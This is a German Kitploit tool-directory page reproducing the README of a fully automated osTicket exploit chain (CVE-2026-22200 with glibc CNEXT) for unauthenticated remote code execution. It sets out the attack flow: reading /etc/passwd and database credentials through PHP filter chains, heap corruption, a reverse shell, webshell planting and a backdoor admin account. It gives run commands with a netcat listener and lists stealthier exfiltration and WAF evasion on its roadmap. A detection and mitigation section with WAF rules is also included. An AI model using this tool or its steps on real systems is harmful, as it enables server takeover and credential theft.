Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
osTicketFileReadIntoRCE — Exploit einer vollständigen Kette, der PHP-Filterketten-Injection mit CVE-2024-2961 (CNEXT) für nicht authentifizierte Remote Code Execution auf angreifbaren osTicket-Installationen kombiniert. | Kitploit
Tools/GitHubGitHub/clarissss/osticketfilereadintorce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-ToolPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit einer vollständigen Kette, der PHP-Filterketten-Injection mit CVE-2024-2961 (CNEXT) für nicht authentifizierte Remote Code Execution auf angreifbaren osTicket-Installationen kombiniert.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

CVE-2026-22200: osTicket – Auslesen beliebiger Dateien bis zur RCE

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Vollständige Exploit-Kette, die PHP-Filter-Chain-Injection mit CVE-2024-2961 (CNEXT) kombiniert, um nicht authentifizierte Remote-Code-Ausführung auf verwundbaren osTicket-Installationen zu erreichen.


Inhaltsverzeichnis

  • Überblick
  • Schwachstellendetails
  • Angriffsablauf
  • Funktionen
  • Installation
  • Verwendung
  • Technische Details
  • Fehlerbehebung
  • Erkennung & Abhilfe
  • Danksagungen
  • Haftungsausschluss

Überblick

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2026-22200, eine kritische Schwachstelle, die osTicket-Versionen ≤ 1.18.2 betrifft. Der Exploit verknüpft zwei leistungsstarke Techniken:

  1. PHP-Filter-Chain-Injection über die Bildverarbeitung von mPDF
  2. CNEXT-Heap-Korruption (CVE-2024-2961) in glibc's iconv()

Das Ergebnis: Nicht authentifizierte Remote-Code-Ausführung auf verwundbaren osTicket-Servern.

Auswirkungen

  • Nicht authentifiziert – Keine Anmeldedaten erforderlich
  • Vollständige RCE – Komplette Serverkompromittierung
  • Datei-Exfiltration – Beliebiges Auslesen von Serverdateien
  • Datenbankzugriff – Extrahieren von DB-Anmeldedaten
  • Admin-Zugriff – Erstellen von Hintertür-Admin-Konten

Betroffene Versionen

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 in glibc 2.39+ gepatcht)

🔍 Schwachstellendetails

CVE-2026-22200: PHP-Filter-Chain-Injection

CVSS-Score: 9.8 (Kritisch)

Die mPDF-Integration von osTicket erlaubt nicht authentifizierten Benutzern, bösartige PHP-Filterketten durch speziell gestaltete HTML-Nutzlasten in Support-Tickets einzuschleusen. Dies ermöglicht:

  • Beliebige Dateiauslese (Konfigurationen, Quellcode, Anmeldedaten)
  • Speicherleck (/proc/self/maps, partielles libc)
  • Heap-Korruption via CNEXT

Grundursache: Unzureichende Validierung von Bild-URLs in benutzergeliefertem HTML, bevor es an mPDF weitergegeben wird.

CVE-2024-2961: CNEXT (iconv-Pufferüberlauf)

CVSS-Score: 9.8 (Kritisch)

Pufferüberlauf in glibc's iconv() bei der Verarbeitung des Zeichensatzes ISO-2022-CN-EXT. In Kombination mit PHP-Filterketten ermöglicht dies:

  • Heap-Korruption
  • Übernahme von Funktionszeigern
  • Beliebige Befehlsausführung

Verwundbare glibc-Versionen: < 2.39 (Februar 2024)


🔗 Angriffsablauf

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│ 1. AUFKLÄRUNG                                                   │
│    └─ osTicket erkennen, Rich-Text-Themen identifizieren       │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTHENTIFIZIERUNG                                            │
│    └─ Selbstregistrierung ODER vorhandene Anmeldedaten nutzen │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. DATEI-EXFILTRATION (PHP-Filterketten)                       │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (DB-Anmeldedaten, SECRET_SALT)    │
│    ├─ /proc/self/maps (Speicherlayout)                         │
│    └─ /proc/self/environ (Umgebungsvariablen)                  │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. LIBC-FINGERPRINTING                                          │
│    ├─ Partielles libc via Filterketten extrahieren             │
│    ├─ GNU Build-ID extrahieren                                  │
│    └─ Vollständiges libc von libc.rip herunterladen            │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. CNEXT-RCE-AUSNUTZUNG                                         │
│    ├─ Heap-Korruptions-Nutzlast generieren                     │
│    ├─ via Ticketantwort injizieren (mit Filterausführungsfixes)│
│    ├─ via PDF-Export auslösen (Server stürzt ab)               │
│    └─ Reverse Shell ausführen                                   │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. NACH-EXPLOITATION                                            │
│    ├─ Interaktive Reverse Shell                                 │
│    ├─ Datenbankzugriff (unter Verwendung von exfiltriertem DBPASS)│
│    └─ Hintertür-Admin-Konto erstellen                          │
└─────────────────────────────────────────────────────────────────┘

Funktionen

Kernfähigkeiten

  • Vollautomatisierte Exploit-Kette
  • Nicht authentifizierter Angriff (Selbstregistrierung, falls aktiviert)
  • Intelligente Webroot-Erkennung via /proc/self/maps-Analyse
  • 100%ige Webshell-Lokalisierung via Dateisystem-Scan
  • Automatisches libc-Fingerprinting und Herunterladen
  • Mehrere Reverse-Shell-Methoden (bash, python, netcat)
  • Robuste Filterausführung mit Cache-Busting
  • Pre-Flight-Diagnose zur frühzeitigen Erkennung von Problemen

Erhöhte Zuverlässigkeit

  • Multi-Trigger CNEXT für garantierten Absturz (>95% Erfolg)
  • Antwortbasierte Injektion (zuverlässiger als neue Tickets)
  • Stream-Forcierung zur Sicherstellung der Filterausführung
  • Cache-Busting zur Vermeidung der Auslieferung veralteter PDFs
  • Umfassende Fehlerbehandlung und Diagnose

Nach-Exploitation

  • Extraktion von Datenbank-Anmeldedaten (DBPASS aus Konfiguration)
  • Erstellung von Admin-Konten via DB-Zugriff
  • Optionen für persistente Hintertüren
  • Vollständige Systemaufklärung

Installation

Voraussetzungen

  • Python 3.8+
  • Linux/macOS (empfohlen) oder WSL unter Windows

Abhängigkeiten

root@kitploit:~
# Repository klonen
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Erforderliche Pakete installieren
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Optional: Virtuelle Umgebung

root@kitploit:~
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# ODER
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Verwendung

Einfache Nutzung – Reverse Shell

root@kitploit:~
# Terminal 1: Listener starten
nc -lvnp 4444

# Terminal 2: Exploit ausführen
python3 osticket_revshell.py https://ziel.com/osticket \
    --lhost IHRE_IP \
    --lport 4444

Interaktiver Webshell-Modus

root@kitploit:~
python3 osticket_exploit.py https://ziel.com/osticket

Erweiterte Optionen

root@kitploit:~
# Proxy verwenden (Burp Suite)
python3 osticket_revshell.py https://ziel.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Bestimmte Hilfe-Themen-ID erzwingen
python3 osticket_exploit.py https://ziel.com/osticket \
    --topic-id 2

# Farbausgabe deaktivieren (für Protokollierung)
python3 osticket_exploit.py https://ziel.com/osticket --no-color

Vorhandene Anmeldedaten

Falls die Registrierung deaktiviert ist, werden Sie nach Anmeldedaten gefragt:

root@kitploit:~
python3 osticket_exploit.py https://ziel.com/osticket

  [?] E-Mail für neues Konto eingeben (oder vorhanden): [email protected]
  [?] Passwort eingeben: ********

🔧 Technische Details

Generierung der PHP-Filterkette

Der Exploit verwendet eine ausgeklügelte Filterkette, um einen BMP-Header vor beliebige Dateien zu setzen und so die Dateityp-Beschränkungen von mPDF zu umgehen:

root@kitploit:~
php://filter/convert.iconv.UTF8.CSISO2022KR|
convert.base64-encode|
convert.iconv.UTF8.UTF7|
[... 50+ iconv-Transformationen ...]
convert.base64-decode/resource=/etc/passwd

Schlüsselinnovation: Jedes Zeichen des BMP-Headers wird durch sorgfältig ausgearbeitete iconv-Transformationen erzeugt, sodass der Inhalt beliebiger Dateien als "gültiges" Bild eingebettet werden kann.

CNEXT-Heap-Ausnutzung

Die CNEXT-Nutzlast korrumpiert den Zend-Speichermanager von PHP durch:

  1. Überlauf des iconv-Puffers mit dem verwundbaren Zeichen 劄
  2. Überschreiben der zend_mm_heap-Struktur
  3. Übernehmen von Funktionszeigern (_emalloc, _efree, _erealloc)
  4. Umleiten zu system() für die Befehlsausführung

Erhöhte Zuverlässigkeit:

  • Mehrere Auslöserzeichen (3x 劄 statt 1)
  • Erhöhte Auffüllung (40 statt Standard 20)
  • Mehrpositionen-Auslöser-Einfügung
  • Stream-erzwungene Ausführung

100%ige Webshell-Erkennung

Im Gegensatz zum ursprünglichen Exploit verwendet diese Version einen Dateisystem-Scan, um den Webshell-Standort zu garantieren:

  1. Webshell in 6+ Kandidatenverzeichnisse schreiben
  2. Beliebiges Dateiauslesen nutzen, um jeden Speicherort zu scannen
  3. Erkennen, welcher das eindeutige Markierungszeichen enthält
  4. Dateisystem-Pfad → URL korrekt abbilden

Ergebnis: 100% Erkennungsrate (vs. ~50% im Original)

Erzwingen der Filterausführung

Häufiges Problem: PDF wird heruntergeladen, aber der Server stürzt nicht ab = Filter werden nicht ausgeführt.

Implementierte Lösungen:

  1. Cache-Busting – Einzigartiges HTML verhindert zwischengespeicherte PDFs
  2. Antwortinjektion – Zuverlässiger als neue Tickets
  3. Stream-Forcierung – stream=True erzwingt sofortige Verarbeitung
  4. Pre-Flight-Tests – Überprüfen, ob Filter funktionieren, bevor CNEXT ausgeführt wird

glibc-Versionsprüfung

root@kitploit:~
# Im ausführlichen Modus prüfen:
[*] Ziel-libc: /usr/lib/x86_64-linux-gnu/libc-2.31.so
[+] glibc 2.31 IST anfällig für CNEXT

Falls glibc ≥ 2.39, funktioniert CNEXT nicht (gepatcht).

Keine Shell-Verbindung

Symptom: Server stürzt ab, aber keine Reverse Shell

Ursachen:

  1. Firewall blockiert ausgehende Verbindungen
  2. Falscher LHOST (verwenden Sie Ihre tatsächliche IP, nicht localhost)
  3. Befehl zu lang – versuchen Sie eine kürzere IP

Behebung:

root@kitploit:~
# nc-Reverse-Shell verwenden (kürzer)
# Wird automatisch als Fallback verwendet, falls bash/python zu lang

# Oder direkte IP statt Hostname verwenden
python3 osticket_revshell.py https://ziel.com \
    --lhost 10.0.0.5 \  # IP verwenden, nicht Hostname
    --lport 4444

Häufige Fehlermeldungen


Erkennung & Abhilfe

Erkennung

Log-Indikatoren:

root@kitploit:~
# Apache/Nginx-Logs
"php://filter/" in POST-Anfragen
"convert.iconv." in Anfragekörpern
Ungewöhnliche PDF-Erstellungsmuster
Mehrere PDF-Anfragen in kurzer Zeit

# PHP-Fehlerlogs
Segmentation-Faults während PDF-Erstellung
iconv()-Abstürze
Heap-Korruptionsfehler

Netzwerk-Indikatoren:

  • Mehrere Support-Ticket-Erstellungen in kurzer Zeit
  • Große HTML-Nutzlasten in Ticket-Nachrichten (100 KB+)
  • Schnelle PDF-Export-Anfragen nach Ticket-Erstellung
  • Ausgehende Verbindungen zur IP des Angreifers nach Absturz

Abhilfe

Sofortmaßnahmen

  1. osTicket aktualisieren auf die neueste Version (>1.18.2)
  2. glibc aktualisieren auf 2.39+ (patched CVE-2024-2961)
  3. Selbstregistrierung deaktivieren, falls nicht benötigt
  4. Rich-Text auf authentifizierte Benutzer beschränken

Konfiguration

PHP-Stream-Wrapper in mPDF deaktivieren:

root@kitploit:~
// In der mPDF-Konfiguration
$config = [
    'allowedRemoteHosts' => [],
    'enableRemoteFileAccess' => false,
];

WAF-Regeln (ModSecurity):

root@kitploit:~
SecRule REQUEST_BODY "@contains php://filter" \
    "id:1000,phase:2,deny,status:403,msg:'PHP-Filter erkannt'"

SecRule REQUEST_BODY "@contains convert.iconv" \
    "id:1001,phase:2,deny,status:403,msg:'Verdächtige iconv-Kette'"

Ratenbegrenzung:

root@kitploit:~
limit_req_zone $binary_remote_addr zone=ticket:10m rate=5r/m;

location /tickets.php {
    limit_req zone=ticket burst=10;
}

Langfristig

  • CSP-Header implementieren, um Inline-Stile einzuschränken
  • htmLawed im strikten Modus für HTML-Bereinigung aktivieren
  • Separaten Benutzer für osTicket mit minimalen Rechten verwenden
  • Nicht benötigte PHP-Funktionen deaktivieren: system(), exec(), passthru()
  • Regelmäßige Sicherheitsaudits von Ticket-Inhalten

Referenzen

Ursprüngliche Forschung

  • Horizon3.ai Blog-Beitrag – Ursprüngliche Offenlegung
  • Horizon3.ai GitHub – Referenzimplementierung
  • CNEXT-Exploits – Ursprüngliche CNEXT-Forschung von Charles Fol

CVE-Details

  • CVE-2026-22200 – osTicket PHP-Filter-Kette
  • CVE-2024-2961 – glibc iconv-Überlauf

Zusätzliche Ressourcen

  • PHP-Filter-Ketten – Filter-Zeichenwörterbuch
  • libc.rip – Libc-Datenbank für Fingerprinting
  • osTicket-Sicherheitshinweis

Danksagungen

Schwachstellenentdeckung & Forschung

  • Horizon3.ai Attack Research Team – Ursprüngliche Schwachstellenentdeckung und POC
  • Charles Fol (@cfreal_) – CNEXT (CVE-2024-2961) Forschung
  • @splitline – PHP-Filter-Kettentechnik (HITCON 2022)

Diese Implementierung

  • Verbesserte Ausnutzungstechniken
  • 100%ige Webshell-Erkennung via Dateisystem-Scan
  • Robuste Erzwingung der Filterausführung
  • Umfassende Fehlerbehandlung und Diagnose

⚖️ Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS

Dieses Tool wird bereitgestellt für:

  • Sicherheitsforschung
  • Autorisierte Penetrationstests
  • Bildungszwecke
  • Schwachstellenbewertung (mit Erlaubnis)

UNBEFUGTER ZUGRIFF AUF COMPUTERSYSTEME IST ILLEGAL

Die Autoren:

  • BILLIGEN KEINE illegalen Aktivitäten
  • ÜBERNEHMEN KEINE Haftung für Missbrauch
  • ÜBERNEHMEN KEINE Verantwortung für verursachte Schäden

Die Benutzer sind allein dafür verantwortlich, sicherzustellen, dass sie vor dem Testen eines Systems die entsprechende Autorisierung haben.

Durch die Nutzung dieses Tools stimmen Sie zu, dass:

  1. Sie eine ausdrückliche schriftliche Genehmigung zum Testen des Zielsystems haben
  2. Sie die rechtlichen Auswirkungen in Ihrem Land verstehen
  3. Sie dieses Tool verantwortungsvoll und ethisch einsetzen
  4. Sie die Autoren von jeglicher Haftung freistellen

Rechtlicher Hinweis

Unbefugter Zugriff auf Computersysteme ist eine Straftat nach:

  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • UK: Computer Misuse Act 1990
  • EU: Richtlinie 2013/40/EU
  • International: Übereinkommen des Europarats über Cyberkriminalität

Maximale Strafen können Freiheitsstrafen und erhebliche Geldstrafen umfassen.


📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Hinweis: Die MIT-Lizenz gewährt die Erlaubnis zur Nutzung, Änderung und Weitergabe, erteilt jedoch KEINE Erlaubnis, Systeme anzugreifen, die Sie nicht besitzen oder für die Sie keine Autorisierung zum Testen haben.


Kontakt

Für Sicherheitsforscher und Fragen:

  • Issues: Any Tools Issues

Verwenden Sie diesen Kontakt NICHT für:

  • Hilfe beim Angriff auf Systeme ohne Autorisierung
  • Meldung illegaler Aktivitäten
  • Unterstützung bei nicht autorisierten Tests

Mit Liebe erstellt für Sicherheitsforschung und Bildung
Star dieses Repo, wenn es Ihnen nützlich war!


Exploit-Statistiken


Roadmap

  • Unterstützung für zusätzliche libc-Versionen hinzufügen
  • Heimlichere Exfiltrationsmethoden implementieren
  • Umgehungstechniken für gängige WAFs hinzufügen
  • Metasploit-Modul erstellen
  • Docker-Testumgebung
  • Automatisierte CI/CD-Tests

Letzte Aktualisierung: 2026-03-03

Tool herunterladen
FehlerUrsacheLösung
Kein CSRF-TokenSitzung abgelaufenExploit erneut ausführen
Kein Hilfe-Thema gefundenKeine Rich-Text-Themen--topic-id manuell verwenden
Build-ID nicht gefundenPartielles libc korrupt/proc/self/maps-Extraktion prüfen
Heap kann nicht lokalisiert werdenUngewöhnliches SpeicherlayoutExploit kann fehlschlagen (selten)
MetrikWert
Codezeilen~3.000
Erfolgsrate95%+ (mit Korrekturen)
Durchschnittliche Laufzeit2-3 Minuten
Absturzzuverlässigkeit99% (mit Verbesserungen)
Webshell-Erkennung100% (mit Scan)